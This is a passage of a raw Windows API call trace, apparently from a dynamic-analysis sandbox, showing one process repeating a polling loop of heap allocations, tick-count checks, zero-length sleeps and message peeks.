hHeap=0x2620000) returned 1 [0066.351] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.351] GetTickCount () returned 0x1d1de [0066.351] Sleep (dwMilliseconds=0x0) [0066.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.351] GetLastError () returned 0x0 [0066.351] GetCurrentProcessId () returned 0xa44 [0066.351] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.351] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.351] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.351] GetTickCount () returned 0x1d1de [0066.351] GetTickCount () returned 0x1d1de [0066.351] GetTickCount () returned 0x1d1de [0066.351] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.351] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.351] GetTickCount () returned 0x1d1de [0066.352] Sleep (dwMilliseconds=0x0) [0066.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.352] GetLastError () returned 0x0 [0066.352] GetCurrentProcessId () returned 0xa44 [0066.352] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.352] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.352] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.352] GetTickCount () returned 0x1d1de [0066.352] GetTickCount () returned 0x1d1de [0066.352] GetTickCount () returned 0x1d1de [0066.352] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.352] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.352] GetTickCount () returned 0x1d1de [0066.352] Sleep (dwMilliseconds=0x0) [0066.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.352] GetLastError () returned 0x0 [0066.352] GetCurrentProcessId () returned 0xa44 [0066.353] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.353] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.353] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.353] GetTickCount () returned 0x1d1de [0066.353] GetTickCount () returned 0x1d1de [0066.353] GetTickCount () returned 0x1d1de [0066.353] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.353] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.353] GetTickCount () returned 0x1d1de [0066.353] Sleep (dwMilliseconds=0x0) [0066.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.353] GetLastError () returned 0x0 [0066.353] GetCurrentProcessId () returned 0xa44 [0066.353] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.353] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.353] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.353] GetTickCount () returned 0x1d1de [0066.353] GetTickCount () returned 0x1d1de [0066.353] GetTickCount () returned 0x1d1de [0066.353] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.354] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.354] GetTickCount () returned 0x1d1de [0066.354] Sleep (dwMilliseconds=0x0) [0066.354] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.354] GetLastError () returned 0x0 [0066.354] GetCurrentProcessId () returned 0xa44 [0066.354] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.354] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.354] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.354] GetTickCount () returned 0x1d1de [0066.354] GetTickCount () returned 0x1d1de [0066.354] GetTickCount () returned 0x1d1de [0066.354] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.354] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.354] GetTickCount () returned 0x1d1de [0066.354] Sleep (dwMilliseconds=0x0) [0066.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.355] GetLastError () returned 0x0 [0066.355] GetCurrentProcessId () returned 0xa44 [0066.355] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.355] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.355] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.355] GetTickCount () returned 0x1d1de [0066.355] GetTickCount () returned 0x1d1de [0066.355] GetTickCount () returned 0x1d1de [0066.355] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.355] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.355] GetTickCount () returned 0x1d1de [0066.355] Sleep (dwMilliseconds=0x0) [0066.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.355] GetLastError () returned 0x0 [0066.355] GetCurrentProcessId () returned 0xa44 [0066.355] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.355] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.356] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.356] GetTickCount () returned 0x1d1de [0066.356] GetTickCount () returned 0x1d1de [0066.356] GetTickCount () returned 0x1d1de [0066.356] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.356] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.356] GetTickCount () returned 0x1d1de [0066.356] Sleep (dwMilliseconds=0x0) [0066.356] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.356] GetLastError () returned 0x0 [0066.356] GetCurrentProcessId () returned 0xa44 [0066.356] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.356] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.356] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.356] GetTickCount () returned 0x1d1de [0066.356] GetTickCount () returned 0x1d1de [0066.356] GetTickCount () returned 0x1d1de [0066.356] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.356] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.357] GetTickCount () returned 0x1d1de [0066.357] Sleep (dwMilliseconds=0x0) [0066.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.357] GetLastError () returned 0x0 [0066.357] GetCurrentProcessId () returned 0xa44 [0066.357] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.357] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.357] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.357] GetTickCount () returned 0x1d1de [0066.357] GetTickCount () returned 0x1d1de [0066.357] GetTickCount () returned 0x1d1de [0066.357] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.357] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.357] GetTickCount () returned 0x1d1de [0066.357] Sleep (dwMilliseconds=0x0) [0066.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.358] GetLastError () returned 0x0 [0066.358] GetCurrentProcessId () returned 0xa44 [0066.358] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.358] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.358] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.358] GetTickCount () returned 0x1d1de [0066.358] GetTickCount () returned 0x1d1de [0066.358] GetTickCount () returned 0x1d1de [0066.358] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.358] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.358] GetTickCount () returned 0x1d1de [0066.358] Sleep (dwMilliseconds=0x0) [0066.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.358] GetLastError () returned 0x0 [0066.358] GetCurrentProcessId () returned 0xa44 [0066.358] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.358] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.358] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.359] GetTickCount () returned 0x1d1de [0066.359] GetTickCount () returned 0x1d1de [0066.359] GetTickCount () returned 0x1d1de [0066.359] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.359] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.359] GetTickCount () returned 0x1d1de [0066.359] Sleep (dwMilliseconds=0x0) [0066.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.359] GetLastError () returned 0x0 [0066.359] GetCurrentProcessId () returned 0xa44 [0066.359] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.359] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.359] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.359] GetTickCount () returned 0x1d1de [0066.359] GetTickCount () returned 0x1d1de [0066.360] GetTickCount () returned 0x1d1ee [0066.360] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.360] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.360] GetTickCount () returned 0x1d1ee [0066.360] Sleep (dwMilliseconds=0x0) [0066.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.360] GetLastError () returned 0x0 [0066.360] GetCurrentProcessId () returned 0xa44 [0066.360] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.360] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.360] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.360] GetTickCount () returned 0x1d1ee [0066.360] GetTickCount () returned 0x1d1ee [0066.360] GetTickCount () returned 0x1d1ee [0066.360] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.360] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.360] GetTickCount () returned 0x1d1ee [0066.361] Sleep (dwMilliseconds=0x0) [0066.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.361] GetLastError () returned 0x0 [0066.361] GetCurrentProcessId () returned 0xa44 [0066.361] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.361] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.361] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.361] GetTickCount () returned 0x1d1ee [0066.361] GetTickCount () returned 0x1d1ee [0066.361] GetTickCount () returned 0x1d1ee [0066.361] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.361] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.361] GetTickCount () returned 0x1d1ee [0066.361] Sleep (dwMilliseconds=0x0) [0066.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.361] GetLastError () returned 0x0 [0066.362] GetCurrentProcessId () returned 0xa44 [0066.362] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.362] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.362] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.362] GetTickCount () returned 0x1d1ee [0066.362] GetTickCount () returned 0x1d1ee [0066.362] GetTickCount () returned 0x1d1ee [0066.362] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.362] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.362] GetTickCount () returned 0x1d1ee [0066.362] Sleep (dwMilliseconds=0x0) [0066.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.362] GetLastError () returned 0x0 [0066.362] GetCurrentProcessId () returned 0xa44 [0066.362] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.362] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.362] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.362] GetTickCount () returned 0x1d1ee [0066.362] GetTickCount () returned 0x1d1ee [0066.363] GetTickCount () returned 0x1d1ee [0066.363] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.363] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.363] GetTickCount () returned 0x1d1ee [0066.363] Sleep (dwMilliseconds=0x0) [0066.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.363] GetLastError () returned 0x0 [0066.363] GetCurrentProcessId () returned 0xa44 [0066.363] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.363] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.363] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.363] GetTickCount () returned 0x1d1ee [0066.363] GetTickCount () returned 0x1d1ee [0066.363] GetTickCount () returned 0x1d1ee [0066.363] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.363] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.363] GetTickCount () returned 0x1d1ee [0066.364] Sleep (dwMilliseconds=0x0) [0066.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.364] GetLastError () returned 0x0 [0066.364] GetCurrentProcessId () returned 0xa44 [0066.364] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.364] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.364] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.364] GetTickCount () returned 0x1d1ee [0066.364] GetTickCount () returned 0x1d1ee [0066.364] GetTickCount () returned 0x1d1ee [0066.364] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.364] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.364] GetTickCount () returned 0x1d1ee [0066.364] Sleep (dwMilliseconds=0x0) [0066.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.364] GetLastError () returned 0x0 [0066.365] GetCurrentProcessId () returned 0xa44 [0066.365] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.365] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.365] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.365] GetTickCount () returned 0x1d1ee [0066.365] GetTickCount () returned 0x1d1ee [0066.365] GetTickCount () returned 0x1d1ee [0066.365] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.365] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.365] GetTickCount () returned 0x1d1ee [0066.365] Sleep (dwMilliseconds=0x0) [0066.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.365] GetLastError () returned 0x0 [0066.365] GetCurrentProcessId () returned 0xa44 [0066.365] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.365] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.365] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.365] GetTickCount () returned 0x1d1ee [0066.365] GetTickCount () returned 0x1d1ee [0066.365] GetTickCount () returned 0x1d1ee [0066.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.366] GetTickCount () returned 0x1d1ee [0066.366] Sleep (dwMilliseconds=0x0) [0066.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.366] GetLastError () returned 0x0 [0066.366] GetCurrentProcessId () returned 0xa44 [0066.366] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.366] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.366] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.366] GetTickCount () returned 0x1d1ee [0066.366] GetTickCount () returned 0x1d1ee [0066.366] GetTickCount () returned 0x1d1ee [0066.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.366] GetTickCount () returned 0x1d1ee [0066.366] Sleep (dwMilliseconds=0x0) [0066.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.367] GetLastError () returned 0x0 [0066.367] GetCurrentProcessId () returned 0xa44 [0066.367] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.367] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.367] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.367] GetTickCount () returned 0x1d1ee [0066.367] GetTickCount () returned 0x1d1ee [0066.367] GetTickCount () returned 0x1d1ee [0066.367] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.367] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.367] GetTickCount () returned 0x1d1ee [0066.367] Sleep (dwMilliseconds=0x0) [0066.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.367] GetLastError () returned 0x0 [0066.367] GetCurrentProcessId () returned 0xa44 [0066.367] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.367] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.368] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.368] GetTickCount () returned 0x1d1ee [0066.368] GetTickCount () returned 0x1d1ee [0066.368] GetTickCount () returned 0x1d1ee [0066.368] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.368] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.368] GetTickCount () returned 0x1d1ee [0066.368] Sleep (dwMilliseconds=0x0) [0066.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.368] GetLastError () returned 0x0 [0066.368] GetCurrentProcessId () returned 0xa44 [0066.368] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.368] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.368] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.368] GetTickCount () returned 0x1d1ee [0066.368] GetTickCount () returned 0x1d1ee [0066.368] GetTickCount () returned 0x1d1ee [0066.368] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.368] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.368] GetTickCount () returned 0x1d1ee [0066.369] Sleep (dwMilliseconds=0x0) [0066.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.369] GetLastError () returned 0x0 [0066.369] GetCurrentProcessId () returned 0xa44 [0066.369] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.369] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.369] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.369] GetTickCount () returned 0x1d1ee [0066.369] GetTickCount () returned 0x1d1ee [0066.369] GetTickCount () returned 0x1d1ee [0066.369] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.369] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.369] GetTickCount () returned 0x1d1ee [0066.369] Sleep (dwMilliseconds=0x0) [0066.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.370] GetLastError () returned 0x0 [0066.370] GetCurrentProcessId () returned 0xa44 [0066.370] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.370] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.370] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.370] GetTickCount () returned 0x1d1ee [0066.370] GetTickCount () returned 0x1d1ee [0066.370] GetTickCount () returned 0x1d1ee [0066.370] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.370] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.370] GetTickCount () returned 0x1d1ee [0066.370] Sleep (dwMilliseconds=0x0) [0066.370] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.370] GetLastError () returned 0x0 [0066.370] GetCurrentProcessId () returned 0xa44 [0066.370] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.370] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.370] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.371] GetTickCount () returned 0x1d1ee [0066.371] GetTickCount () returned 0x1d1ee [0066.371] GetTickCount () returned 0x1d1ee [0066.371] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.371] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.371] GetTickCount () returned 0x1d1ee [0066.371] Sleep (dwMilliseconds=0x0) [0066.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.371] GetLastError () returned 0x0 [0066.371] GetCurrentProcessId () returned 0xa44 [0066.371] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.371] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.371] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.371] GetTickCount () returned 0x1d1ee [0066.371] GetTickCount () returned 0x1d1ee [0066.371] GetTickCount () returned 0x1d1ee [0066.371] HeapFree (in: hHeap=0x2620000, 